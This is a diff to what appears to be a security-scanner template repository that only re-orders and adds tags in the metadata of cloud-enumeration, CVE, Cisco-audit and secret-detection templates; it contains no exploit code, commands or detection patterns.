diff --git a/cloud/enum/aws-app-enum.yaml b/cloud/enum/aws-app-enum.yaml index ab7ed36795..620985a1d7 100644 --- a/cloud/enum/aws-app-enum.yaml +++ b/cloud/enum/aws-app-enum.yaml @@ -9,7 +9,7 @@ info: metadata: verified: true max-request: 1 - tags: cloud,cloud-enum,aws + tags: cloud,enum,cloud-enum,aws self-contained: true diff --git a/cloud/enum/aws-s3-bucket-enum.yaml b/cloud/enum/aws-s3-bucket-enum.yaml index 7c692dda40..0c2e757474 100644 --- a/cloud/enum/aws-s3-bucket-enum.yaml +++ b/cloud/enum/aws-s3-bucket-enum.yaml @@ -9,7 +9,7 @@ info: metadata: verified: true max-request: 1 - tags: cloud,cloud-enum,aws + tags: cloud,enum,cloud-enum,aws self-contained: true diff --git a/cloud/enum/azure-db-enum.yaml b/cloud/enum/azure-db-enum.yaml index 8a3ec2887d..b755245da3 100644 --- a/cloud/enum/azure-db-enum.yaml +++ b/cloud/enum/azure-db-enum.yaml @@ -9,7 +9,7 @@ info: metadata: verified: true max-request: 1 - tags: cloud,cloud-enum,azure + tags: cloud,enum,cloud-enum,azure self-contained: true diff --git a/cloud/enum/azure-vm-cloud-enum.yaml b/cloud/enum/azure-vm-cloud-enum.yaml index 7ed0d03f3c..099ef9d73f 100644 --- a/cloud/enum/azure-vm-cloud-enum.yaml +++ b/cloud/enum/azure-vm-cloud-enum.yaml @@ -8,7 +8,7 @@ info: Searches for Azure virtual machines via their registered DNS names. metadata: verified: true - tags: cloud,cloud-enum,azure + tags: cloud,enum,cloud-enum,azure self-contained: true diff --git a/cloud/enum/azure-website-enum.yaml b/cloud/enum/azure-website-enum.yaml index 94737b9889..4d3450854c 100644 --- a/cloud/enum/azure-website-enum.yaml +++ b/cloud/enum/azure-website-enum.yaml @@ -8,7 +8,7 @@ info: Searches for Azure websites that are registered and responding. metadata: verified: true - tags: cloud,azure + tags: cloud,enum,azure self-contained: true diff --git a/cloud/enum/gcp-app-engine-enum.yaml b/cloud/enum/gcp-app-engine-enum.yaml index 25da290f22..6886017fb0 100644 --- a/cloud/enum/gcp-app-engine-enum.yaml +++ b/cloud/enum/gcp-app-engine-enum.yaml @@ -8,7 +8,7 @@ info: Searches for App Engine Apps in GCP. metadata: verified: true - tags: cloud,cloud-enum,gcp + tags: enum,cloud,cloud-enum,gcp self-contained: true diff --git a/cloud/enum/gcp-bucket-enum.yaml b/cloud/enum/gcp-bucket-enum.yaml index 6889edcaad..d0a3d5f33c 100644 --- a/cloud/enum/gcp-bucket-enum.yaml +++ b/cloud/enum/gcp-bucket-enum.yaml @@ -8,7 +8,7 @@ info: Searches for open and protected buckets in GCP. metadata: verified: true - tags: cloud,cloud-enum,gcp + tags: cloud,enum,cloud-enum,gcp self-contained: true diff --git a/cloud/enum/gcp-firebase-app-enum.yaml b/cloud/enum/gcp-firebase-app-enum.yaml index 45a6277ff7..519bd1a536 100644 --- a/cloud/enum/gcp-firebase-app-enum.yaml +++ b/cloud/enum/gcp-firebase-app-enum.yaml @@ -8,7 +8,7 @@ info: Searches for Firebase Apps in GCP. metadata: verified: true - tags: cloud,cloud-enum,gcp + tags: enum,cloud,cloud-enum,gcp self-contained: true diff --git a/cloud/enum/gcp-firebase-rtdb-enum.yaml b/cloud/enum/gcp-firebase-rtdb-enum.yaml index 27a2ee646e..7a04fd4f24 100644 --- a/cloud/enum/gcp-firebase-rtdb-enum.yaml +++ b/cloud/enum/gcp-firebase-rtdb-enum.yaml @@ -8,7 +8,7 @@ info: Searches for Firebase Realtime Databases in GCP. metadata: verified: true - tags: cloud,cloud-enum,gcp + tags: enum,cloud,cloud-enum,gcp self-contained: true diff --git a/code/cves/2019/CVE-2019-14287.yaml b/code/cves/2019/CVE-2019-14287.yaml index b4c4db720d..95596fb198 100644 --- a/code/cves/2019/CVE-2019-14287.yaml +++ b/code/cves/2019/CVE-2019-14287.yaml @@ -14,7 +14,7 @@ info: max-request: 2 vendor: canonical product: ubuntu_linux - tags: cve,cve2019,sudo,code,linux,privesc,local + tags: cve,cve2019,sudo,code,linux,privesc,local,canonical self-contained: true code: diff --git a/code/cves/2023/CVE-2023-2640.yaml b/code/cves/2023/CVE-2023-2640.yaml index f1cecabbdc..eeb5e77ee1 100644 --- a/code/cves/2023/CVE-2023-2640.yaml +++ b/code/cves/2023/CVE-2023-2640.yaml @@ -29,7 +29,7 @@ info: max-request: 2 vendor: canonical product: ubuntu_linux - tags: packetstorm,cve,cve2023,kernel,ubuntu,linux,privesc,local + tags: cve,cve2023,code,packetstorm,kernel,ubuntu,linux,privesc,local,canonical self-contained: true code: diff --git a/code/cves/2023/CVE-2023-49105.yaml b/code/cves/2023/CVE-2023-49105.yaml index 4cdc94f210..f5c1743b14 100644 --- a/code/cves/2023/CVE-2023-49105.yaml +++ b/code/cves/2023/CVE-2023-49105.yaml @@ -24,7 +24,7 @@ info: vendor: owncloud product: owncloud shodan-query: title:"owncloud" - tags: cve,cve2023,owncloud,code,auth-bypass + tags: cve,cve2023,code,owncloud,auth-bypass variables: username: admin diff --git a/code/cves/2023/CVE-2023-4911.yaml b/code/cves/2023/CVE-2023-4911.yaml index 79113dc40b..da3dd40d5c 100644 --- a/code/cves/2023/CVE-2023-4911.yaml +++ b/code/cves/2023/CVE-2023-4911.yaml @@ -19,7 +19,7 @@ info: metadata: max-request: 1 vendor: glibc - tags: cve,cve2023,glibc,looneytunables,linux,privesc,local + tags: cve,cve2023,code,glibc,looneytunables,linux,privesc,local self-contained: true code: diff --git a/file/audit/cisco/configure-aaa-service.yaml b/file/audit/cisco/configure-aaa-service.yaml index f7d0205634..fc9e359e36 100644 --- a/file/audit/cisco/configure-aaa-service.yaml +++ b/file/audit/cisco/configure-aaa-service.yaml @@ -12,7 +12,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0 cwe-id: CWE-200 - tags: cisco,config-audit,cisco-switch,file,router + tags: file,audit,cisco,config-audit,cisco-switch,router file: - extensions: diff --git a/file/audit/cisco/configure-service-timestamps-debug.yaml b/file/audit/cisco/configure-service-timestamps-debug.yaml index 9979a4f137..b723b1bb09 100644 --- a/file/audit/cisco/configure-service-timestamps-debug.yaml +++ b/file/audit/cisco/configure-service-timestamps-debug.yaml @@ -12,7 +12,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0 cwe-id: CWE-200 - tags: cisco,config-audit,cisco-switch,file,router + tags: file,audit,cisco,config-audit,cisco-switch,router file: - extensions: diff --git a/file/audit/cisco/configure-service-timestamps-logmessages.yaml b/file/audit/cisco/configure-service-timestamps-logmessages.yaml index 4e35e84b29..655aa1a271 100644 --- a/file/audit/cisco/configure-service-timestamps-logmessages.yaml +++ b/file/audit/cisco/configure-service-timestamps-logmessages.yaml @@ -12,7 +12,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0 cwe-id: CWE-200 - tags: cisco,config-audit,cisco-switch,file,router + tags: file,audit,cisco,config-audit,cisco-switch,router file: - extensions: diff --git a/file/audit/cisco/disable-ip-source-route.yaml b/file/audit/cisco/disable-ip-source-route.yaml index 613e2cac18..0830ed31b0 100644 --- a/file/audit/cisco/disable-ip-source-route.yaml +++ b/file/audit/cisco/disable-ip-source-route.yaml @@ -13,7 +13,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0 cwe-id: CWE-200 - tags: cisco,config-audit,cisco-switch,file,router + tags: audit,file,cisco,config-audit,cisco-switch,router file: - extensions: diff --git a/file/audit/cisco/disable-pad-service.yaml b/file/audit/cisco/disable-pad-service.yaml index 447b23b3a0..d162aee105 100644 --- a/file/audit/cisco/disable-pad-service.yaml +++ b/file/audit/cisco/disable-pad-service.yaml @@ -12,7 +12,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0 cwe-id: CWE-200 - tags: cisco,config-audit,cisco-switch,file,router + tags: audit,file,cisco,config-audit,cisco-switch,router file: - extensions: diff --git a/file/audit/cisco/enable-secret-for-user-and-password.yaml b/file/audit/cisco/enable-secret-for-user-and-password.yaml index 3311fd4078..997d947883 100644 --- a/file/audit/cisco/enable-secret-for-user-and-password.yaml +++ b/file/audit/cisco/enable-secret-for-user-and-password.yaml @@ -8,7 +8,7 @@ info: To configure the system to time-stamp debugging or logging messages, use one of the service timestamps global configuration commands. Use the no form of this command to disable this service. reference: - https://www.cisco.com/E-Learning/bulk/public/tac/cim/cib/using_cisco_ios_software/cmdrefs/service_timestamps.htm - tags: cisco,config-audit,cisco-switch,file,router + tags: file,audit,cisco,config-audit,cisco-switch,router file: - extensions: diff --git a/file/audit/cisco/logging-enable.yaml b/file/audit/cisco/logging-enable.yaml index 0b89bfecca..2e2a0a041e 100644 --- a/file/audit/cisco/logging-enable.yaml +++ b/file/audit/cisco/logging-enable.yaml @@ -12,7 +12,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0 cwe-id: CWE-200 - tags: cisco,config-audit,cisco-switch,file + tags: audit,file,cisco,config-audit,cisco-switch file: - extensions: diff --git a/file/audit/cisco/set-and-secure-passwords.yaml b/file/audit/cisco/set-and-secure-passwords.yaml index 32548e8f61..71b5dbf567 100644 --- a/file/audit/cisco/set-and-secure-passwords.yaml +++ b/file/audit/cisco/set-and-secure-passwords.yaml @@ -12,7 +12,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0 cwe-id: CWE-200 - tags: cisco,config-audit,cisco-switch,file + tags: audit,file,cisco,config-audit,cisco-switch file: - extensions: diff --git a/file/electron/node-integration-enabled.yaml b/file/electron/node-integration-enabled.yaml index e8cd71845d..df486a02e7 100644 --- a/file/electron/node-integration-enabled.yaml +++ b/file/electron/node-integration-enabled.yaml @@ -9,7 +9,7 @@ info: reference: - https://blog.yeswehack.com/yeswerhackers/exploitation/pentesting-electron-applications/ - https://book.hacktricks.xyz/pentesting/pentesting-web/xss-to-rce-electron-desktop-apps - tags: electron,file,nodejs + tags: electron,file,nodejs,xss file: - extensions: diff --git a/file/keys/adobe/adobe-client.yaml b/file/keys/adobe/adobe-client.yaml index 157d9bc44b..8c8c64872c 100644 --- a/file/keys/adobe/adobe-client.yaml +++ b/file/keys/adobe/adobe-client.yaml @@ -9,7 +9,7 @@ info: - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/adobe-client-id.go metadata: verified: true - tags: adobe,file,token + tags: keys,file,adobe,token file: - extensions: diff --git a/file/keys/adobe/adobe-secret.yaml b/file/keys/adobe/adobe-secret.yaml index 4693999028..0c10a5510c 100644 --- a/file/keys/adobe/adobe-secret.yaml +++ b/file/keys/adobe/adobe-secret.yaml @@ -11,7 +11,7 @@ info: - https://developer.adobe.com/developer-console/docs/guides/authentication/OAuth/ metadata: verified: true - tags: adobe,oauth,file,token + tags: file,keys,adobe,oauth,token file: - extensions: diff --git a/file/keys/age/age-identity-secret-key.yaml b/file/keys/age/age-identity-secret-key.yaml index 93865a105d..8a6fc3d51b 100644 --- a/file/keys/age/age-identity-secret-key.yaml +++ b/file/keys/age/age-identity-secret-key.yaml @@ -10,7 +10,7 @@ info: - https://github.com/C2SP/C2SP/blob/8b6a842e0360d35111c46be2a8019b2276295914/age.md#the-x25519-recipient-type metadata: verified: true - tags: age-encryption,file,token + tags: file,keys,age-encryption,token file: - extensions: diff --git a/file/keys/age/age-recipient-public-key.yaml b/file/keys/age/age-recipient-public-key.yaml index 916a291a6a..19aeaee933 100644 --- a/file/keys/age/age-recipient-public-key.yaml +++ b/file/keys/age/age-recipient-public-key.yaml @@ -10,7 +10,7 @@ info: - https://github.com/C2SP/C2SP/blob/8b6a842e0360d35111c46be2a8019b2276295914/age.md#the-x25519-recipient-type metadata: verified: true - tags: age-encryption,file,token + tags: file,keys,age-encryption,token file: - extensions: diff --git a/file/keys/airtable-key.yaml b/file/keys/airtable-key.yaml index 5ebf9b4354..581fb6bb78 100644 --- a/file/keys/airtable-key.yaml +++ b/file/keys/airtable-key.yaml @@ -9,7 +9,7 @@ info: - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/airtable-api-key.go metadata: verified: true - tags: airtable,file,token + tags: keys,file,airtable,token file: - extensions: - all diff --git a/file/keys/amazon/amazon-account-id.yaml b/file/keys/amazon/amazon-account-id.yaml index 76efead567..aa7041daa4 100644 --- a/file/keys/amazon/amazon-account-id.yaml +++ b/file/keys/amazon/amazon-account-id.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-200 metadata: verified: true - tags: aws,amazon,token,file + tags: file,keys,aws,amazon,token file: - extensions: diff --git a/file/keys/amazon/amazon-mws-auth-token.yaml b/file/keys/amazon/amazon-mws-auth-token.yaml index 118d87e6ff..4ca548e10a 100644 --- a/file/keys/amazon/amazon-mws-auth-token.yaml +++ b/file/keys/amazon/amazon-mws-auth-token.yaml @@ -9,7 +9,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cwe-id: CWE-200 - tags: token,file,amazon,auth,mws + tags: file,keys,token,amazon,auth,mws file: - extensions: diff --git a/file/keys/amazon/amazon-session-token.yaml b/file/keys/amazon/amazon-session-token.yaml index 9b8ae08e39..fd64848174 100644 --- a/file/keys/amazon/amazon-session-token.yaml +++ b/file/keys/amazon/amazon-session-token.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-200 metadata: verified: true - tags: aws,amazon,token,file,session + tags: file,keys,aws,amazon,token,session file: - extensions: diff --git a/file/keys/amazon/amazon-sns-token.yaml b/file/keys/amazon/amazon-sns-token.yaml index a0945cddbf..6dc4dbce11 100644 --- a/file/keys/amazon/amazon-sns-token.yaml +++ b/file/keys/amazon/amazon-sns-token.yaml @@ -9,7 +9,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0 cwe-id: CWE-200 - tags: file,token,amazon,aws,sns + tags: file,keys,token,amazon,aws,sns file: - extensions: diff --git a/file/keys/amazon/aws-access-id.yaml b/file/keys/amazon/aws-access-id.yaml index ba69c887f7..2c595fc1a8 100644 --- a/file/keys/amazon/aws-access-id.yaml +++ b/file/keys/amazon/aws-access-id.yaml @@ -9,7 +9,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0 cwe-id: CWE-200 - tags: token,file,aws,amazon + tags: file,keys,token,aws,amazon file: - extensions: diff --git a/file/keys/amazon/aws-cognito.yaml b/file/keys/amazon/aws-cognito.yaml index 9bb20958a6..427f17c0d3 100644 --- a/file/keys/amazon/aws-cognito.yaml +++ b/file/keys/amazon/aws-cognito.yaml @@ -9,7 +9,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0 cwe-id: CWE-200 - tags: token,file,aws,amazon + tags: file,keys,token,aws,amazon file: - extensions: diff --git a/file/keys/atlassian/atlassian-api-token.yaml b/file/keys/atlassian/atlassian-api-token.yaml index 31b39e97ce..5e0d7e7cf6 100644 --- a/file/keys/atlassian/atlassian-api-token.yaml +++ b/file/keys/atlassian/atlassian-api-token.yaml @@ -9,7 +9,7 @@ info: - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/atlassian-api-token.yaml metadata: verified: true - tags: atlassian,file,token,api + tags: file,keys,atlassian,token,api file: - extensions: diff --git a/file/keys/azure/azure-connection-string.yaml b/file/keys/azure/azure-connection-string.yaml index 15699b3bbd..85bce1f1d8 100644 --- a/file/keys/azure/azure-connection-string.yaml +++ b/file/keys/azure/azure-connection-string.yaml @@ -10,7 +10,7 @@ info: - https://docs.microsoft.com/en-us/azure/storage/common/storage-configure-connection-string metadata: verified: true - tags: azure,file,token + tags: file,keys,azure,token file: - extensions: diff --git a/file/keys/beamer-api-token.yaml b/file/keys/beamer-api-token.yaml index 0e074c8f8a..a9b3292a09 100644 --- a/file/keys/beamer-api-token.yaml +++ b/file/keys/beamer-api-token.yaml @@ -9,7 +9,7 @@ info: - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/beamer-api-token.go metadata: verified: true - tags: beamer,file,token + tags: file,keys,beamer,token file: - extensions: - all diff --git a/file/keys/bitbucket/bitbucket-client-id.yaml b/file/keys/bitbucket/bitbucket-client-id.yaml index 1e5f6e28bc..d1f5031da1 100644 --- a/file/keys/bitbucket/bitbucket-client-id.yaml +++ b/file/keys/bitbucket/bitbucket-client-id.yaml @@ -9,7 +9,7 @@ info: - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/bitbucket-client-id.go metadata: verified: true - tags: bitbucket,file,token + tags: file,keys,bitbucket,token file: - extensions: diff --git a/file/keys/bitbucket/bitbucket-client-secret.yaml b/file/keys/bitbucket/bitbucket-client-secret.yaml index ac4853d8b5..6f71c12991 100644 --- a/file/keys/bitbucket/bitbucket-client-secret.yaml +++ b/file/keys/bitbucket/bitbucket-client-secret.yaml @@ -9,7 +9,7 @@ info: - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/bitbucket-client-secret.go metadata: verified: true - tags: bitbucket,file,token + tags: keys,file,bitbucket,token file: - extensions: diff --git a/file/keys/bittrex/bittrex-access-key.yaml b/file/keys/bittrex/bittrex-access-key.yaml index d70d8aa532..89273b61d7 100644 --- a/file/keys/bittrex/bittrex-access-key.yaml +++ b/file/keys/bittrex/bittrex-access-key.yaml @@ -9,7 +9,7 @@ info: - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/bittrex-access-key.go metadata: verified: true - tags: bittrex,file,token + tags: file,keys,bittrex,token file: - extensions: diff --git a/file/keys/bittrex/bittrex-secret-key.yaml b/file/keys/bittrex/bittrex-secret-key.yaml index 302d0277d7..65a65cb195 100644 --- a/file/keys/bittrex/bittrex-secret-key.yaml +++ b/file/keys/bittrex/bittrex-secret-key.yaml @@ -9,7 +9,7 @@ info: - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/bittrex-secret-key.go metadata: verified: true - tags: bittrex,file,token + tags: file,keys,bittrex,token file: - extensions: diff --git a/file/keys/branch-key.yaml b/file/keys/branch-key.yaml index 14efab44d2..2a76090cad 100644 --- a/file/keys/branch-key.yaml +++ b/file/keys/branch-key.yaml @@ -11,7 +11,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0 cwe-id: CWE-200 - tags: token,file + tags: file,keys,token file: - extensions: - all diff --git a/file/keys/clojars-api-token.yaml b/file/keys/clojars-api-token.yaml index bbbd9daed7..739bac83b7 100644 --- a/file/keys/clojars-api-token.yaml +++ b/file/keys/clojars-api-token.yaml @@ -9,7 +9,7 @@ info: - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/clojars-api-token.go metadata: verified: true - tags: clojars,file,token + tags: file,keys,clojars,token file: - extensions: - all diff --git a/file/keys/cloudinary.yaml b/file/keys/cloudinary.yaml index e09cc1e7c5..a1215b7168 100644 --- a/file/keys/cloudinary.yaml +++ b/file/keys/cloudinary.yaml @@ -9,7 +9,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-200 - tags: token,file,cloudinary + tags: keys,file,token,cloudinary file: - extensions: - all diff --git a/file/keys/code-climate-token.yaml b/file/keys/code-climate-token.yaml index ef9a00670f..dad78e890c 100644 --- a/file/keys/code-climate-token.yaml +++ b/file/keys/code-climate-token.yaml @@ -14,7 +14,7 @@ info: cwe-id: CWE-200 metadata: verified: true - tags: codeclimate,token,file + tags: file,keys,codeclimate,token file: - extensions: - all diff --git a/file/keys/codecov-access-token.yaml b/file/keys/codecov-access-token.yaml index b84a3a26a6..6362ff6539 100644 --- a/file/keys/codecov-access-token.yaml +++ b/file/keys/codecov-access-token.yaml @@ -9,7 +9,7 @@ info: - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/codecov-access-token.go metadata: verified: true - tags: codecov,file,token + tags: file,keys,codecov,token file: - extensions: - all diff --git a/file/keys/coinbase-access-token.yaml b/file/keys/coinbase-access-token.yaml index f23a608dac..c93c55a114 100644 --- a/file/keys/coinbase-access-token.yaml +++ b/file/keys/coinbase-access-token.yaml @@ -9,7 +9,7 @@ info: - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/coinbase-access-token.go metadata: verified: true - tags: coinbase,file,token + tags: file,keys,coinbase,token file: - extensions: - all diff --git a/file/keys/confluent/confluent-access-token.yaml b/file/keys/confluent/confluent-access-token.yaml index 8dbd4af058..e9c312f276 100644 --- a/file/keys/confluent/confluent-access-token.yaml +++ b/file/keys/confluent/confluent-access-token.yaml @@ -9,7 +9,7 @@ info: - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/confluent-access-token.go metadata: verified: true - tags: confluent,file,token + tags: file,keys,confluent,token file: - extensions: diff --git a/file/keys/confluent/confluent-secret-token.yaml b/file/keys/confluent/confluent-secret-token.yaml index edc2828201..5fb2598ad4 100644 --- a/file/keys/confluent/confluent-secret-token.yaml +++ b/file/keys/confluent/confluent-secret-token.yaml @@ -9,7 +9,7 @@ info: - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/confluent-secret-key.go metadata: verified: true - tags: confluent,file,token + tags: file,keys,confluent,token file: - extensions: diff --git a/file/keys/contentful-api-token.yaml b/file/keys/contentful-api-token.yaml index ab3facb00f..4e1ae01cb4 100644 --- a/file/keys/contentful-api-token.yaml +++ b/file/keys/contentful-api-token.yaml @@ -9,7 +9,7 @@ info: - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/contentful-delivery-api-token.go metadata: verified: true - tags: contentful,file,token + tags: file,keys,contentful,token file: - extensions: - all diff --git a/file/keys/cratesio-api-key.yaml b/file/keys/cratesio-api-key.yaml index 9134c3fb19..11bbb08bb5 100644 --- a/file/keys/cratesio-api-key.yaml +++ b/file/keys/cratesio-api-key.yaml @@ -15,7 +15,7 @@ info: cwe-id: CWE-200 metadata: verified: true - tags: crates,token,file + tags: keys,file,crates,token file: - extensions: - all diff --git a/file/keys/credentials.yaml b/file/keys/credentials.yaml index 04403dfb9e..5694bf4da4 100644 --- a/file/keys/credentials.yaml +++ b/file/keys/credentials.yaml @@ -9,7 +9,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-200 - tags: token,file,auth + tags: file,keys,token,auth file: - extensions: - all diff --git a/file/keys/databricks-api-token.yaml b/file/keys/databricks-api-token.yaml index c952a2efe2..2b2d03734c 100644 --- a/file/keys/databricks-api-token.yaml +++ b/file/keys/databricks-api-token.yaml @@ -9,7 +9,7 @@ info: - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/databricks-api-token.go metadata: verified: true - tags: databricks,file,token + tags: file,keys,databricks,token file: - extensions: - all diff --git a/file/keys/datadog-access-token.yaml b/file/keys/datadog-access-token.yaml index 95f9a864ef..fd6718ee42 100644 --- a/file/keys/datadog-access-token.yaml +++ b/file/keys/datadog-access-token.yaml @@ -9,7 +9,7 @@ info: - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/datadog-access-token.go metadata: verified: true - tags: datadog,file,token + tags: keys,file,datadog,token file: - extensions: - all diff --git a/file/keys/digitalocean/digitalocean-access-token.yaml b/file/keys/digitalocean/digitalocean-access-token.yaml index 9019dffd4b..b22d656159 100644 --- a/file/keys/digitalocean/digitalocean-access-token.yaml +++ b/file/keys/digitalocean/digitalocean-access-token.yaml @@ -9,7 +9,7 @@ info: - https://docs.digitalocean.com/reference/api/ metadata: verified: true - tags: digitalocean,file,token + tags: keys,file,digitalocean,token file: - extensions: diff --git a/file/keys/digitalocean/digitalocean-personal-access.yaml b/file/keys/digitalocean/digitalocean-personal-access.yaml index af5cdcc8d7..569c7d1355 100644 --- a/file/keys/digitalocean/digitalocean-personal-access.yaml +++ b/file/keys/digitalocean/digitalocean-personal-access.yaml @@ -9,7 +9,7 @@ info: - https://docs.digitalocean.com/reference/api/ metadata: verified: true - tags: digitalocean,file,token + tags: file,keys,digitalocean,token file: - extensions: diff --git a/file/keys/digitalocean/digitalocean-refresh-token.yaml b/file/keys/digitalocean/digitalocean-refresh-token.yaml index 75c2d8e6ea..7c4f207308 100644 --- a/file/keys/digitalocean/digitalocean-refresh-token.yaml +++ b/file/keys/digitalocean/digitalocean-refresh-token.yaml @@ -9,7 +9,7 @@ info: - https://docs.digitalocean.com/reference/api/ metadata: verified: true - tags: digitalocean,file,token + tags: file,keys,digitalocean,token file: - extensions: diff --git a/file/keys/discord/discord-api-token.yaml b/file/keys/discord/discord-api-token.yaml index 7b4b9d1c34..c80a733a3a 100644 --- a/file/keys/discord/discord-api-token.yaml +++ b/file/keys/discord/discord-api-token.yaml @@ -9,7 +9,7 @@ info: - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/discord-api-token.go metadata: verified: true - tags: discord,file,token + tags: file,keys,discord,token file: - extensions: diff --git a/file/keys/discord/discord-cilent-secret.yaml b/file/keys/discord/discord-cilent-secret.yaml index aae8b6e432..1d28f5e082 100644 --- a/file/keys/discord/discord-cilent-secret.yaml +++ b/file/keys/discord/discord-cilent-secret.yaml @@ -9,7 +9,7 @@ info: - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/discord-client-secret.go metadata: verified: true - tags: discord,file,token + tags: file,keys,discord,token file: - extensions: diff --git a/file/keys/discord/discord-client-id.yaml b/file/keys/discord/discord-client-id.yaml index 2f3bebeb7f..4c4901375c 100644 --- a/file/keys/discord/discord-client-id.yaml +++ b/file/keys/discord/discord-client-id.yaml @@ -9,7 +9,7 @@ info: - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/discord-client-id.go metadata: verified: true - tags: discord,file,token + tags: file,keys,discord,token file: - extensions: diff --git a/file/keys/doppler-api-token.yaml b/file/keys/doppler-api-token.yaml index 18023a9325..91516a4b2f 100644 --- a/file/keys/doppler-api-token.yaml +++ b/file/keys/doppler-api-token.yaml @@ -9,7 +9,7 @@ info: - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/doppler-api-token.go metadata: verified: true - tags: doppler,file,token + tags: file,keys,doppler,token file: - extensions: - all diff --git a/file/keys/droneci-access-token.yaml b/file/keys/droneci-access-token.yaml index 2ce8ae2ae3..11e7459d5d 100644 --- a/file/keys/droneci-access-token.yaml +++ b/file/keys/droneci-access-token.yaml @@ -9,7 +9,7 @@ info: - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/droneci-access-token.go metadata: verified: true - tags: droneci,file,token + tags: file,keys,droneci,token file: - extensions: - all diff --git a/file/keys/dropbox/dropbox-api-token.yaml b/file/keys/dropbox/dropbox-api-token.yaml index 32ccc4a2a9..7d15d4cc4f 100644 --- a/file/keys/dropbox/dropbox-api-token.yaml +++ b/file/keys/dropbox/dropbox-api-token.yaml @@ -9,7 +9,7 @@ info: - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/dropbox-api-token.go metadata: verified: true - tags: dropbox,file,token + tags: file,keys,dropbox,token file: - extensions: diff --git a/file/keys/dropbox/dropbox-longlived-token.yaml b/file/keys/dropbox/dropbox-longlived-token.yaml index 358ddfbaf2..446db9a521 100644 --- a/file/keys/dropbox/dropbox-longlived-token.yaml +++ b/file/keys/dropbox/dropbox-longlived-token.yaml @@ -9,7 +9,7 @@ info: - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/dropbox-long-lived-api-token.go metadata: verified: true - tags: dropbox,file,token + tags: file,keys,dropbox,token file: - extensions: diff --git a/file/keys/dropbox/dropbox-shortlived-token.yaml b/file/keys/dropbox/dropbox-shortlived-token.yaml index 7cb2b2a953..5bfe78cba3 100644 --- a/file/keys/dropbox/dropbox-shortlived-token.yaml +++ b/file/keys/dropbox/dropbox-shortlived-token.yaml @@ -9,7 +9,7 @@ info: - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/dropbox-short-lived-api-token.go metadata: verified: true - tags: dropbox,file,token + tags: file,keys,dropbox,token file: - extensions: diff --git a/file/keys/duffel-api-token.yaml b/file/keys/duffel-api-token.yaml index cef0586d9d..1f84ca9834 100644 --- a/file/keys/duffel-api-token.yaml +++ b/file/keys/duffel-api-token.yaml @@ -9,7 +9,7 @@ info: - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/duffel-api-token.go metadata: verified: true - tags: duffel,file,token + tags: keys,file,duffel,token file: - extensions: - all diff --git a/file/keys/dynatrace-token.yaml b/file/keys/dynatrace-token.yaml index d795c227d0..305b9e086c 100644 --- a/file/keys/dynatrace-token.yaml +++ b/file/keys/dynatrace-token.yaml @@ -9,7 +9,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-200 - tags: token,file + 